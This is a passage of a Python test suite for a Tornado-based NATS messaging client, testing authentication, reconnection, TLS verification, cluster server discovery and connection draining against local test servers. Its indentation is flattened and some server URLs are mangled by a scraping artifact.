self.assertEqual(10, nc2.stats['in_msgs'])
self.assertEqual(110, nc2.stats['in_bytes'])
self.assertEqual(0, nc2.stats['out_msgs'])
self.assertEqual(0, nc2.stats['out_bytes'])
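        # Illustrative note (not part of the original test): with no_echo=True
        # the first connection never receives its own published messages, so
        # its subscription count and in_msgs/in_bytes stats stay at zero, while
        # the echo-enabled nc2 sees all 10 messages; the 110 bytes are simply
        # 10 * len(b'hello world').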
class ClientAuthTest(tornado.testing.AsyncTestCase):
def setUp(self):
print("\n=== RUN {0}.{1}".format(self.__class__.__name__,
self._testMethodName))
self.threads = []
self.server_pool = []
server1 = Gnatsd(port=4223, user="foo", password="bar", http_port=8223)
server2 = Gnatsd(port=4224, user="hoge", password="fuga", http_port=8224)
self.server_pool.append(server1)
self.server_pool.append(server2)
for gnatsd in self.server_pool:
t = threading.Thread(target=gnatsd.start)
self.threads.append(t)
t.start()
http = tornado.httpclient.HTTPClient()
while True:
try:
response1 = http.fetch('http://127.0.0.1:8223/varz')
response2 = http.fetch('http://127.0.0.1:8224/varz')
if response1.code == 200 and response2.code == 200:
break
continue
except:
time.sleep(0.1)
continue
super(ClientAuthTest, self).setUp()
def tearDown(self):
super(ClientAuthTest, self).tearDown()
for gnatsd in self.server_pool:
gnatsd.finish()
for t in self.threads:
t.join()
@tornado.testing.gen_test(timeout=10)
def test_auth_connect(self):
class SampleClient():
def __init__(self):
self.nc = Client()
self.errors = []
self.disconnected_future = tornado.concurrent.Future()
self.reconnected_future = tornado.concurrent.Future()
self.closed_future = tornado.concurrent.Future()
@tornado.gen.coroutine
def foo(self, msg):
yield self.nc.publish(msg.reply, "OK:{}:{}".format(msg.subject, msg.data))
@tornado.gen.coroutine
def bar(self, msg):
yield self.nc.publish(msg.reply, "OK:{}:{}".format(msg.subject, msg.data))
@tornado.gen.coroutine
def quux(self, msg):
yield self.nc.publish(msg.reply, "OK:{}:{}".format(msg.subject, msg.data))
def error_cb(self, err):
self.errors.append(err)
def disconnected_cb(self):
if not self.disconnected_future.done():
self.disconnected_future.set_result(True)
def reconnected_cb(self):
if not self.reconnected_future.done():
self.reconnected_future.set_result(True)
def closed_cb(self):
if not self.closed_future.done():
self.closed_future.set_result(True)
c = SampleClient()
options = {
"dont_randomize": True,
"servers": [
"nats://foo:[email protected]:4223",
"nats://hoge:[email protected]:4224"
],
"loop": self.io_loop,
"error_cb": c.error_cb,
"reconnected_cb": c.reconnected_cb,
"closed_cb": c.closed_cb,
"disconnected_cb": c.disconnected_cb,
"reconnect_time_wait": 0.1,
"max_reconnect_attempts": 3,
}
yield c.nc.connect(**options)
self.assertEqual(True, c.nc._server_info["auth_required"])
sid_1 = yield c.nc.subscribe("foo", "", c.foo)
sid_2 = yield c.nc.subscribe("bar", "", c.bar)
sid_3 = yield c.nc.subscribe("quux", "", c.quux)
self.assertEqual(sid_1, 1)
self.assertEqual(sid_2, 2)
self.assertEqual(sid_3, 3)
yield c.nc.flush()
msg = yield c.nc.request("foo", b"hello")
self.assertEqual(msg.data, "OK:foo:hello")
msg = yield c.nc.request("bar", b"hello")
self.assertEqual(msg.data, "OK:bar:hello")
msg = yield c.nc.request("quux", b"hello")
self.assertEqual(msg.data, "OK:quux:hello")
# Trigger reconnect
a = c.nc._current_server
orig_gnatsd = self.server_pool.pop(0)
orig_gnatsd.finish()
yield tornado.gen.sleep(1)
# Use future for when disconnect/reconnect events to happen.
try:
yield tornado.gen.with_timeout(timedelta(seconds=2), c.disconnected_future)
yield tornado.gen.with_timeout(timedelta(seconds=2), c.reconnected_future)
finally:
b = c.nc._current_server
self.assertNotEqual(a.uri, b.uri)
# Should still be able to request/response after reconnect.
response = yield c.nc.request("foo", b"world")
self.assertEqual(response.data, "OK:foo:world")
response = yield c.nc.request("bar", b"world")
self.assertEqual(response.data, "OK:bar:world")
response = yield c.nc.request("quux", b"world")
self.assertEqual(response.data, "OK:quux:world")
self.assertTrue(c.nc.is_connected)
self.assertFalse(c.nc.is_reconnecting)
self.assertFalse(c.nc.is_closed)
# Start original server with different auth and should eventually closed connection.
conf = """
port = 4223
http = 8223
authorization {
user = hoge
pass = fuga
}
"""
with Gnatsd(port=4223, http_port=8223, conf=conf) as gnatsd:
# Reset futures before closing.
c.disconnected_future = tornado.concurrent.Future()
other_gnatsd = self.server_pool.pop(0)
other_gnatsd.finish()
# Reconnect once again
yield tornado.gen.with_timeout(timedelta(seconds=2), c.disconnected_future)
yield tornado.gen.with_timeout(timedelta(seconds=2), c.closed_future)
# There will be a mix of Authorization errors and StreamClosedError errors.
            self.assertTrue(len(c.errors) > 1)
@tornado.testing.gen_test(timeout=10)
def test_auth_connect_fails(self):
class Component:
def __init__(self, nc):
self.nc = nc
self.errors = []
self.disconnected_cb_called = tornado.concurrent.Future()
self.closed_cb_called = tornado.concurrent.Future()
self.reconnected_cb_called = False
self.log = Log()
def error_cb(self, err):
self.errors.append(err)
def disconnected_cb(self):
if not self.disconnected_cb_called.done():
self.disconnected_cb_called.set_result(True)
def close_cb(self):
if not self.closed_cb_called.done():
self.closed_cb_called.set_result(True)
def reconnected_cb(self):
self.reconnected_cb_called = True
nc = Client()
c = Component(nc)
conf = """
port = 4228
http = 8448
authorization {
user = foo
pass = bar
}
"""
with Gnatsd(port=4228, http_port=8448, conf=conf) as gnatsd:
yield c.nc.connect(
loop=self.io_loop,
dont_randomize=True,
servers=[
"nats://foo:[email protected]:4228",
"nats://foo2:[email protected]:4224"
],
closed_cb=c.close_cb,
error_cb=c.error_cb,
disconnected_cb=c.disconnected_cb,
reconnected_cb=c.reconnected_cb,
max_reconnect_attempts=2,
reconnect_time_wait=0.1,
)
self.assertEqual(True, c.nc.is_connected)
self.assertEqual(True, nc._server_info["auth_required"])
# Confirm that messages went through
yield c.nc.subscribe("foo", "", c.log.persist)
yield c.nc.flush()
yield c.nc.publish("foo", "bar")
yield c.nc.flush()
yield tornado.gen.sleep(0.5)
# Shutdown first server, triggering reconnect...
gnatsd.finish()
# Wait for reconnect logic kick in and then fail due to authorization error.
yield tornado.gen.with_timeout(
timedelta(seconds=1), c.disconnected_cb_called)
yield tornado.gen.with_timeout(
timedelta(seconds=1), c.closed_cb_called)
errors_at_close = len(c.errors)
for i in range(0, 20):
yield tornado.gen.sleep(0.1)
errors_after_close = len(c.errors)
self.assertEqual(errors_at_close, errors_after_close)
self.assertEqual(1, len(c.log.records["foo"]))
@tornado.testing.gen_test(timeout=10)
def test_connect_with_auth_token_option(self):
nc = NATS()
conf = """
port = 4227
http = 8227
authorization {
token = token
}
"""
with Gnatsd(port=4227, http_port=8227, conf=conf) as gnatsd:
yield nc.connect("nats://127.0.0.1:4227",
token='token',
loop=self.io_loop,
)
self.assertIn('auth_required', nc._server_info)
self.assertTrue(nc.is_connected)
received = tornado.concurrent.Future()
@tornado.gen.coroutine
def handler(msg):
received.set_result(msg)
yield nc.subscribe("foo", cb=handler)
yield nc.flush()
yield nc.publish("foo", b'bar')
yield tornado.gen.with_timeout(
timedelta(seconds=1), received)
yield nc.close()
self.assertTrue(nc.is_closed)
self.assertFalse(nc.is_connected)
@tornado.testing.gen_test(timeout=10)
def test_close_connection(self):
nc = Client()
        options = {
            "dont_randomize": True,
            "servers": [
                "nats://foo:bar@127.0.0.1:4223",
                "nats://hoge:fuga@127.0.0.1:4224"
            ],
            "io_loop": self.io_loop
        }
yield nc.connect(**options)
self.assertEqual(True, nc._server_info["auth_required"])
log = Log()
sid_1 = yield nc.subscribe("foo", "", log.persist)
self.assertEqual(sid_1, 1)
sid_2 = yield nc.subscribe("bar", "", log.persist)
self.assertEqual(sid_2, 2)
sid_3 = yield nc.subscribe("quux", "", log.persist)
self.assertEqual(sid_3, 3)
yield nc.publish("foo", "hello")
yield tornado.gen.sleep(1.0)
# Done
yield nc.close()
orig_gnatsd = self.server_pool.pop(0)
orig_gnatsd.finish()
try:
a = nc._current_server
# Wait and assert that we don't reconnect.
yield tornado.gen.sleep(3)
finally:
b = nc._current_server
self.assertEqual(a.uri, b.uri)
self.assertFalse(nc.is_connected)
self.assertFalse(nc.is_reconnecting)
self.assertTrue(nc.is_closed)
with (self.assertRaises(ErrConnectionClosed)):
yield nc.publish("hello", "world")
with (self.assertRaises(ErrConnectionClosed)):
yield nc.flush()
with (self.assertRaises(ErrConnectionClosed)):
yield nc.subscribe("hello", "worker")
with (self.assertRaises(ErrConnectionClosed)):
yield nc.publish_request("hello", "inbox", "world")
with (self.assertRaises(ErrConnectionClosed)):
yield nc.request("hello", "world")
with (self.assertRaises(ErrConnectionClosed)):
yield nc.timed_request("hello", "world")
class ClientTLSTest(tornado.testing.AsyncTestCase):
def setUp(self):
print("\n=== RUN {0}.{1}".format(self.__class__.__name__,
self._testMethodName))
self.threads = []
self.server_pool = []
conf = """
# Simple TLS config file
port: 4444
net: 127.0.0.1
http_port: 8222
tls {
cert_file: './tests/configs/certs/server-cert.pem'
key_file: './tests/configs/certs/server-key.pem'
ca_file: './tests/configs/certs/ca.pem'
timeout: 10
}
"""
config_file = tempfile.NamedTemporaryFile(mode='w', delete=True)
config_file.write(conf)
config_file.flush()
server = Gnatsd(port=4444, http_port=8222, config_file=config_file)
self.server_pool.append(server)
server = Gnatsd(port=4445, http_port=8223, config_file=config_file)
self.server_pool.append(server)
for gnatsd in self.server_pool:
t = threading.Thread(target=gnatsd.start)
self.threads.append(t)
t.start()
http = tornado.httpclient.HTTPClient()
while True:
try:
response = http.fetch(
'http://127.0.0.1:%d/varz' % gnatsd.http_port)
if response.code == 200:
break
continue
except:
time.sleep(0.1)
continue
super(ClientTLSTest, self).setUp()
def tearDown(self):
for gnatsd in self.server_pool:
gnatsd.finish()
for t in self.threads:
t.join()
super(ClientTLSTest, self).tearDown()
@tornado.testing.gen_test(timeout=10)
def test_tls_connection(self):
class Component:
def __init__(self, nc):
self.nc = nc
self.error = None
self.error_cb_called = False
self.close_cb_called = False
self.disconnected_cb_called = False
self.reconnected_cb_called = False
self.msgs = []
@tornado.gen.coroutine
def subscription_handler(self, msg):
yield self.nc.publish(msg.reply, 'hi')
def error_cb(self, err):
self.error = err
self.error_cb_called = True
def close_cb(self):
self.close_cb_called = True
def disconnected_cb(self):
self.disconnected_cb_called = True
def reconnected_cb(self):
self.reconnected_cb_called = True
nc = Client()
c = Component(nc)
options = {
"servers": ["nats://127.0.0.1:4444"],
"io_loop": self.io_loop,
"close_cb": c.close_cb,
"error_cb": c.error_cb,
"disconnected_cb": c.disconnected_cb,
"reconnected_cb": c.reconnected_cb
}
yield c.nc.connect(**options)
yield c.nc.subscribe("hello", cb=c.subscription_handler)
yield c.nc.flush()
for i in range(0, 10):
msg = yield c.nc.timed_request("hello", b'world')
c.msgs.append(msg)
self.assertEqual(len(c.msgs), 10)
self.assertFalse(c.disconnected_cb_called)
self.assertFalse(c.close_cb_called)
self.assertFalse(c.error_cb_called)
self.assertFalse(c.reconnected_cb_called)
# Should be able to close normally
yield c.nc.close()
self.assertTrue(c.disconnected_cb_called)
self.assertTrue(c.close_cb_called)
self.assertFalse(c.error_cb_called)
self.assertFalse(c.reconnected_cb_called)
@tornado.testing.gen_test(timeout=15)
def test_tls_reconnection(self):
class Component:
def __init__(self, nc):
self.nc = nc
self.error = None
self.error_cb_called = False
self.close_cb_called = False
self.disconnected_cb_called = False
self.reconnected_cb_called = False
self.msgs = []
self.reconnected_future = tornado.concurrent.Future()
self.disconnected_future = tornado.concurrent.Future()
@tornado.gen.coroutine
def subscription_handler(self, msg):
yield self.nc.publish(msg.reply, 'hi')
def error_cb(self, err):
self.error = err
self.error_cb_called = True
def close_cb(self):
self.close_cb_called = True
def disconnected_cb(self):
self.disconnected_cb_called = True
if not self.disconnected_future.done():
self.disconnected_future.set_result(True)
def reconnected_cb(self):
self.reconnected_cb_called = True
if not self.reconnected_future.done():
self.reconnected_future.set_result(True)
nc = Client()
c = Component(nc)
options = {
"dont_randomize": True,
"servers": [
"nats://127.0.0.1:4444",
"nats://127.0.0.1:4445",
],
"loop": self.io_loop,
"closed_cb": c.close_cb,
"error_cb": c.error_cb,
"disconnected_cb": c.disconnected_cb,
"reconnected_cb": c.reconnected_cb,
"reconnect_time_wait": 0.1,
"max_reconnect_attempts": 5
}
yield c.nc.connect(**options)
yield c.nc.subscribe("hello", cb=c.subscription_handler)
yield c.nc.flush()
for i in range(0, 5):
msg = yield c.nc.request("hello", b'world')
c.msgs.append(msg)
self.assertEqual(5, len(c.msgs))
# Trigger disconnect...
orig_gnatsd = self.server_pool.pop(0)
orig_gnatsd.finish()
try:
a = nc._current_server
# Wait for reconnect logic kick in...
yield tornado.gen.with_timeout(
timedelta(seconds=5), c.disconnected_future)
yield tornado.gen.with_timeout(
timedelta(seconds=5), c.reconnected_future)
finally:
b = nc._current_server
self.assertNotEqual(a.uri, b.uri)
self.assertTrue(c.disconnected_cb_called)
self.assertFalse(c.close_cb_called)
self.assertFalse(c.error_cb_called)
self.assertTrue(c.reconnected_cb_called)
for i in range(0, 5):
msg = yield c.nc.request("hello", b'world')
c.msgs.append(msg)
self.assertEqual(len(c.msgs), 10)
# Should be able to close normally
yield c.nc.close()
self.assertTrue(c.disconnected_cb_called)
self.assertTrue(c.close_cb_called)
self.assertFalse(c.error_cb_called)
self.assertTrue(c.reconnected_cb_called)
class ClientTLSCertsTest(tornado.testing.AsyncTestCase):
def setUp(self):
print("\n=== RUN {0}.{1}".format(self.__class__.__name__,
self._testMethodName))
super(ClientTLSCertsTest, self).setUp()
class Component:
def __init__(self, nc):
self.nc = nc
self.error = None
self.error_cb_called = False
self.close_cb_called = False
self.disconnected_cb_called = False
self.reconnected_cb_called = False
self.msgs = []
@tornado.gen.coroutine
def subscription_handler(self, msg):
yield self.nc.publish(msg.reply, 'hi')
def error_cb(self, err):
self.error = err
self.error_cb_called = True
def close_cb(self):
self.close_cb_called = True
def disconnected_cb(self):
self.disconnected_cb_called = True
def reconnected_cb(self):
self.reconnected_cb_called = True
@tornado.testing.gen_test(timeout=10)
def test_tls_verify(self):
nc = Client()
c = self.Component(nc)
options = {
"servers": ["nats://127.0.0.1:4446"],
"allow_reconnect": False,
"io_loop": self.io_loop,
"close_cb": c.close_cb,
"error_cb": c.error_cb,
"disconnected_cb": c.disconnected_cb,
"reconnected_cb": c.reconnected_cb,
"tls": {
"cert_reqs": ssl.CERT_REQUIRED,
"ca_certs": "./tests/configs/certs/ca.pem",
"keyfile": "./tests/configs/certs/client-key.pem",
"certfile": "./tests/configs/certs/client-cert.pem"
}
}
conf = """
port: 4446
net: 127.0.0.1
http_port: 8446
tls {
cert_file: './tests/configs/certs/server-cert.pem'
key_file: './tests/configs/certs/server-key.pem'
ca_file: './tests/configs/certs/ca.pem'
timeout: 10
verify: true
}
"""
with Gnatsd(port=4446, http_port=8446, conf=conf) as gnatsd:
yield c.nc.connect(**options)
yield c.nc.subscribe("hello", cb=c.subscription_handler)
yield c.nc.flush()
for i in range(0, 10):
msg = yield c.nc.timed_request("hello", b'world')
c.msgs.append(msg)
self.assertEqual(len(c.msgs), 10)
self.assertFalse(c.disconnected_cb_called)
self.assertFalse(c.close_cb_called)
self.assertFalse(c.error_cb_called)
self.assertFalse(c.reconnected_cb_called)
# Should be able to close normally
yield c.nc.close()
self.assertTrue(c.disconnected_cb_called)
self.assertTrue(c.close_cb_called)
self.assertFalse(c.error_cb_called)
self.assertFalse(c.reconnected_cb_called)
@tornado.testing.gen_test(timeout=10)
def test_tls_verify_short_timeout_no_servers_available(self):
nc = Client()
c = self.Component(nc)
options = {
"servers": ["nats://127.0.0.1:4446"],
"allow_reconnect": False,
"io_loop": self.io_loop,
"close_cb": c.close_cb,
"error_cb": c.error_cb,
"disconnected_cb": c.disconnected_cb,
"reconnected_cb": c.reconnected_cb,
"tls": {
"cert_reqs": ssl.CERT_REQUIRED,
"ca_certs": "./tests/configs/certs/ca.pem",
"keyfile": "./tests/configs/certs/client-key.pem",
"certfile": "./tests/configs/certs/client-cert.pem"
}
}
conf = """
# port: 4446
port: 4446
net: 127.0.0.1
http_port: 8446
tls {
cert_file: './tests/configs/certs/server-cert.pem'
key_file: './tests/configs/certs/server-key.pem'
ca_file: './tests/configs/certs/ca.pem'
timeout: 0.0001
verify: true
}
"""
with Gnatsd(port=4446, http_port=8446, conf=conf) as gnatsd:
with self.assertRaises(ErrNoServers):
yield c.nc.connect(**options)
@tornado.testing.gen_test(timeout=10)
def test_tls_verify_fails(self):
nc = Client()
c = self.Component(nc)
port = 4447
http_port = 8447
options = {
"servers": ["nats://127.0.0.1:%d" % port],
"max_reconnect_attempts": 5,
"io_loop": self.io_loop,
"close_cb": c.close_cb,
"error_cb": c.error_cb,
"disconnected_cb": c.disconnected_cb,
"reconnected_cb": c.reconnected_cb,
"reconnect_time_wait": 0.1,
"tls": {
"cert_reqs": ssl.CERT_REQUIRED,
# "ca_certs": "./tests/configs/certs/ca.pem",
"keyfile": "./tests/configs/certs/client-key.pem",
"certfile": "./tests/configs/certs/client-cert.pem"
}
}
conf = """
port: %d
net: 127.0.0.1
http_port: %d
tls {
cert_file: './tests/configs/certs/server-cert.pem'
key_file: './tests/configs/certs/server-key.pem'
ca_file: './tests/configs/certs/ca.pem'
timeout: 10
verify: true
}
""" % (port, http_port)
with Gnatsd(port=port, http_port=http_port, conf=conf) as gnatsd:
with self.assertRaises(NatsError):
yield c.nc.connect(**options)
class ShortControlLineNATSServer(tornado.tcpserver.TCPServer):
@tornado.gen.coroutine
def handle_stream(self, stream, address):
while True:
try:
info_line = """INFO {"max_payload": 1048576, "tls_required": false, "server_id":"zrPhBhrjbbUdp2vndDIvE7"}\r\n"""
yield stream.write(info_line)
# Client will be awaiting for a pong next before reaching connected state.
yield stream.write("""PONG\r\n""")
yield tornado.gen.sleep(1)
except tornado.iostream.StreamClosedError:
break
class LargeControlLineNATSServer(tornado.tcpserver.TCPServer):
@tornado.gen.coroutine
def handle_stream(self, stream, address):
while True:
try:
line = """INFO {"max_payload": 1048576, "tls_required": false, "server_id":"%s"}\r\n"""
info_line = line % ("a" * 2048)
yield stream.write(info_line)
# Client will be awaiting for a pong next before reaching connected state.
yield stream.write("""PONG\r\n""")
yield tornado.gen.sleep(1)
except tornado.iostream.StreamClosedError:
break
class ClientConnectTest(tornado.testing.AsyncTestCase):
def setUp(self):
print("\n=== RUN {0}.{1}".format(self.__class__.__name__,
self._testMethodName))
super(ClientConnectTest, self).setUp()
def tearDown(self):
super(ClientConnectTest, self).tearDown()
@tornado.testing.gen_test(timeout=5)
def test_connect_info_large_protocol_line(self):
# Start mock TCP Server
server = LargeControlLineNATSServer()
server.listen(4229)
nc = Client()
options = {
"dont_randomize": True,
"servers": ["nats://127.0.0.1:4229"],
"io_loop": self.io_loop,
"verbose": False
}
yield nc.connect(**options)
self.assertTrue(nc.is_connected)
@tornado.testing.gen_test(timeout=5)
def test_connect_info_large_protocol_line_2(self):
# Start mock TCP Server
server = ShortControlLineNATSServer()
server.listen(4229)
nc = Client()
options = {
"dont_randomize": True,
"servers": ["nats://127.0.0.1:4229"],
"io_loop": self.io_loop,
"verbose": False
}
yield nc.connect(**options)
self.assertTrue(nc.is_connected)
class ClientClusteringDiscoveryTest(tornado.testing.AsyncTestCase):
def setUp(self):
print("\n=== RUN {0}.{1}".format(self.__class__.__name__,
self._testMethodName))
super(ClientClusteringDiscoveryTest, self).setUp()
def tearDown(self):
super(ClientClusteringDiscoveryTest, self).tearDown()
@tornado.testing.gen_test(timeout=15)
def test_servers_discovery(self):
conf = """
cluster {
routes = [
nats-route://127.0.0.1:6222
]
}
"""
nc = Client()
options = {
"servers": ["nats://127.0.0.1:4222"],
"io_loop": self.io_loop,
}
with Gnatsd(port=4222, http_port=8222, cluster_port=6222, conf=conf) as nats1:
yield nc.connect(**options)
yield tornado.gen.sleep(1)
initial_uri = nc.connected_url
with Gnatsd(port=4223, http_port=8223, cluster_port=6223, conf=conf) as nats2:
yield tornado.gen.sleep(1)
srvs = {}
for item in nc._server_pool:
srvs[item.uri.port] = True
self.assertEqual(len(srvs.keys()), 2)
with Gnatsd(port=4224, http_port=8224, cluster_port=6224, conf=conf) as nats3:
yield tornado.gen.sleep(1)
for item in nc._server_pool:
srvs[item.uri.port] = True
self.assertEqual(3, len(srvs.keys()))
srvs = {}
for item in nc.discovered_servers:
srvs[item.uri.port] = True
self.assertTrue(2 <= len(srvs.keys()) <= 3)
srvs = {}
for item in nc.servers:
srvs[item.uri.port] = True
self.assertEqual(3, len(srvs.keys()))
# Terminate the first server and wait for reconnect
nats1.finish()
yield tornado.gen.sleep(1)
final_uri = nc.connected_url
self.assertNotEqual(initial_uri, final_uri)
yield nc.close()
@tornado.testing.gen_test(timeout=15)
def test_servers_discovery_no_randomize(self):
conf = """
cluster {
routes = [
nats-route://127.0.0.1:6232
]
}
"""
nc = Client()
options = {
"servers": ["nats://127.0.0.1:4232"],
"dont_randomize": True,
"loop": self.io_loop,
}
with Gnatsd(
port=4232, http_port=8232, cluster_port=6232,
conf=conf) as nats1:
yield nc.connect(**options)
yield tornado.gen.sleep(1)
with Gnatsd(
port=4233, http_port=8233, cluster_port=6233,
conf=conf) as nats2:
yield tornado.gen.sleep(1)
srvs = []
for item in nc._server_pool:
if item.uri.port not in srvs:
srvs.append(item.uri.port)
self.assertEqual(len(srvs), 2)
with Gnatsd(
port=4234, http_port=8234, cluster_port=6234,
conf=conf) as nats3:
yield tornado.gen.sleep(1)
for item in nc._server_pool:
if item.uri.port not in srvs:
srvs.append(item.uri.port)
self.assertEqual([4232, 4233, 4234], srvs)
yield nc.close()
@tornado.testing.gen_test(timeout=15)
def test_servers_discovery_auth_reconnect(self):
conf = """
cluster {
routes = [
nats-route://127.0.0.1:6222
]
}
authorization {
user = foo
pass = bar
}
"""
reconnected_future = tornado.concurrent.Future()
@tornado.gen.coroutine
def reconnected_cb():
reconnected_future.set_result(True)
nc = Client()
options = {
"servers": ["nats://127.0.0.1:4222"],
"loop": self.io_loop,
"user": "foo",
"password": "bar",
"reconnected_cb": reconnected_cb,
}
with Gnatsd(port=4222, http_port=8222, cluster_port=6222, conf=conf) as nats1:
yield nc.connect(**options)
yield tornado.gen.sleep(1)
initial_uri = nc.connected_url
with Gnatsd(port=4223, http_port=8223, cluster_port=6223, conf=conf) as nats2:
yield tornado.gen.sleep(1)
srvs = {}
for item in nc._server_pool:
srvs[item.uri.port] = True
self.assertEqual(len(srvs.keys()), 2)
with Gnatsd(port=4224, http_port=8224, cluster_port=6224, conf=conf) as nats3:
yield tornado.gen.sleep(1)
for item in nc._server_pool:
srvs[item.uri.port] = True
self.assertEqual(3, len(srvs.keys()))
srvs = {}
for item in nc.discovered_servers:
srvs[item.uri.port] = True
self.assertTrue(2 <= len(srvs.keys()) <= 3)
srvs = {}
for item in nc.servers:
srvs[item.uri.port] = True
self.assertEqual(3, len(srvs.keys()))
# Terminate the first server and wait for reconnect
nats1.finish()
yield tornado.gen.with_timeout(
timedelta(seconds=1), reconnected_future)
# Check if the connection is ok
received = tornado.concurrent.Future()
@tornado.gen.coroutine
def handler(msg):
received.set_result(msg)
yield nc.subscribe("foo", cb=handler)
yield nc.flush()
yield nc.publish("foo", b'bar')
yield tornado.gen.with_timeout(
timedelta(seconds=1), received)
final_uri = nc.connected_url
self.assertNotEqual(initial_uri, final_uri)
yield nc.close()
class ClientDrainTest(tornado.testing.AsyncTestCase):
def setUp(self):
print("\n=== RUN {0}.{1}".format(self.__class__.__name__,
self._testMethodName))
self.threads = []
self.server_pool = []
server = Gnatsd(port=4225, http_port=8225)
self.server_pool.append(server)
for gnatsd in self.server_pool:
t = threading.Thread(target=gnatsd.start)
self.threads.append(t)
t.start()
http = tornado.httpclient.HTTPClient()
while True:
try:
response = http.fetch('http://127.0.0.1:8225/varz')
if response.code == 200:
break
continue
except:
time.sleep(0.1)
continue
super(ClientDrainTest, self).setUp()
def tearDown(self):
for gnatsd in self.server_pool:
gnatsd.finish()
for t in self.threads:
t.join()
super(ClientDrainTest, self).tearDown()
@tornado.testing.gen_test
def test_drain_closes_connection(self):
nc = Client()
future = tornado.concurrent.Future()
@tornado.gen.coroutine
def closed_cb():
future.set_result(True)
@tornado.gen.coroutine
def cb(msg):
pass
yield nc.connect("127.0.0.1:4225",
loop=self.io_loop,
closed_cb=closed_cb,
)
yield nc.subscribe("foo", cb=cb)
yield nc.subscribe("bar", cb=cb)
yield nc.subscribe("quux", cb=cb)
yield nc.drain()
yield tornado.gen.with_timeout(timedelta(seconds=1), future)
self.assertEqual(0, len(nc._subs))
        self.assertTrue(nc.is_closed)
@tornado.testing.gen_test
def test_drain_invalid_subscription(self):
nc = NATS()
yield nc.connect("127.0.0.1:4225",
loop=self.io_loop,
)
msgs = []
@tornado.gen.coroutine
def cb(msg):
msgs.append(msg)
yield nc.subscribe("foo", cb=cb)
yield nc.subscribe("bar", cb=cb)
yield nc.subscribe("quux", cb=cb)
with self.assertRaises(ErrBadSubscription):
yield nc.drain(sid=4)
yield nc.close()
self.assertTrue(nc.is_closed)
@tornado.testing.gen_test
def test_drain_single_subscription(self):
nc = NATS()
yield nc.connect("127.0.0.1:4225", loop=self.io_loop)
msgs = []
@tornado.gen.coroutine
def handler(msg):
msgs.append(msg)
if len(msgs) == 10:
yield tornado.gen.sleep(0.5)
sid = yield nc.subscribe("foo", cb=handler)
for i in range(0, 200):
yield nc.publish("foo", b'hi')
# Relinquish control so that messages are processed.
yield tornado.gen.sleep(0)
yield nc.flush()
sub = nc._subs[sid]
before_drain = sub.pending_queue.qsize()
self.assertTrue(before_drain > 0)
drain_task = yield nc.drain(sid=sid)
yield tornado.gen.with_timeout(timedelta(seconds=1), drain_task)
for i in range(0, 200):
yield nc.publish("foo", b'hi')
# Relinquish control so that messages are processed.
yield tornado.gen.sleep(0)
# No more messages should have been processed.
after_drain = sub.pending_queue.qsize()
self.assertEqual(0, after_drain)
self.assertEqual(200, len(msgs))
yield nc.close()
self.assertTrue(nc.is_closed)
self.assertFalse(nc.is_connected)
@tornado.testing.gen_test(timeout=15)
def test_drain_connection(self):
nc = NATS()
errors = []
drain_done = tornado.concurrent.Future()
def disconnected_cb():
pass
def reconnected_cb():
pass
def error_cb(e):
errors.append(e)
def closed_cb():
drain_done.set_result(True)
yield nc.connect("127.0.0.1:4225",
loop=self.io_loop,
closed_cb=closed_cb,
error_cb=error_cb,
reconnected_cb=reconnected_cb,
disconnected_cb=disconnected_cb,
)
nc2 = NATS()
yield nc2.connect("127.0.0.1:4225", loop=self.io_loop)
msgs = []
@tornado.gen.coroutine
def foo_handler(msg):
if len(msgs) % 20 == 1:
yield tornado.gen.sleep(0.2)
if len(msgs) % 50 == 1:
yield tornado.gen.sleep(0.5)
if msg.reply != "":
yield nc.publish_request(msg.reply, "foo", b'OK!')
yield nc.flush()
@tornado.gen.coroutine
def bar_handler(msg):
if len(msgs) % 20 == 1:
yield tornado.gen.sleep(0.2)
if len(msgs) % 50 == 1:
yield tornado.gen.sleep(0.5)
if msg.reply != "":
yield nc.publish_request(msg.reply, "bar", b'OK!')
yield nc.flush()
@tornado.gen.coroutine
def quux_handler(msg):
if len(msgs) % 20 == 1:
yield tornado.gen.sleep(0.2)
if len(msgs) % 50 == 1:
yield tornado.gen.sleep(0.5)
if msg.reply != "":
yield nc.publish_request(msg.reply, "quux", b'OK!')
yield nc.flush()
sid_foo = yield nc.subscribe("foo", cb=foo_handler)
sid_bar = yield nc.subscribe("bar", cb=bar_handler)
sid_quux = yield nc.subscribe("quux", cb=quux_handler)
@tornado.gen.coroutine
def replies(msg):
msgs.append(msg)
yield nc2.subscribe("my-replies.*", cb=replies)
for i in range(0, 201):
yield nc2.publish_request("foo", "my-replies.AAA", b'help')
yield nc2.publish_request("bar", "my-replies.BBB", b'help')
yield nc2.publish_request("quux", "my-replies.CCC", b'help')
# Relinquish control so that messages are processed.
yield tornado.gen.sleep(0)
yield nc2.flush()
sub_foo = nc._subs[sid_foo]
sub_bar = nc._subs[sid_bar]
sub_quux = nc._subs[sid_quux]
self.assertTrue(sub_foo.pending_queue.qsize() > 0)
self.assertTrue(sub_bar.pending_queue.qsize() > 0)
self.assertTrue(sub_quux.pending_queue.qsize() > 0)
# Drain and close the connection. In case of timeout then
# an async error will be emitted via the error callback.
self.io_loop.spawn_callback(nc.drain)
# Let the draining task a bit of time to run...
yield tornado.gen.sleep(0.5)
# Should be no-op or bail if connection closed.
yield nc.drain()
# State should be closed here already,
yield tornado.gen.with_timeout(timedelta(seconds=10), drain_done)
self.assertEqual(0, len(nc._subs.items()))
self.assertEqual(1, len(nc2._subs.items()))
self.assertTrue(len(msgs) > 150)
# No need to close first connection since drain reaches
# the closed state.
yield nc2.close()
self.assertTrue(nc.is_closed)
self.assertFalse(nc.is_connected)
self.assertTrue(nc2.is_closed)
self.assertFalse(nc2.is_connected)
@tornado.testing.gen_test(timeout=15)
def test_drain_connection_timeout(self):
nc = NATS()
errors = []
drain_done = tornado.concurrent.Future()
@tornado.gen.coroutine
def error_cb(e):
errors.append(e)
@tornado.gen.coroutine
def closed_cb():
drain_done.set_result(True)
yield nc.connect("127.0.0.1:4225",
loop=self.io_loop,
closed_cb=closed_cb,
error_cb=error_cb,
drain_timeout=0.1,
)
nc2 = NATS()
yield nc2.connect("127.0.0.1:4225", loop=self.io_loop)
msgs = []
@tornado.gen.coroutine
def handler(msg):
if len(msgs) % 20 == 1:
yield tornado.gen.sleep(0.2)
if len(msgs) % 50 == 1:
yield tornado.gen.sleep(0.5)
if msg.reply != "":
yield nc.publish_request(msg.reply, "foo", b'OK!')
yield nc.flush()
sid_foo = yield nc.subscribe("foo", cb=handler)
@tornado.gen.coroutine
def replies(msg):
msgs.append(msg)
yield nc2.subscribe("my-replies.*", cb=replies)
for i in range(0, 201):
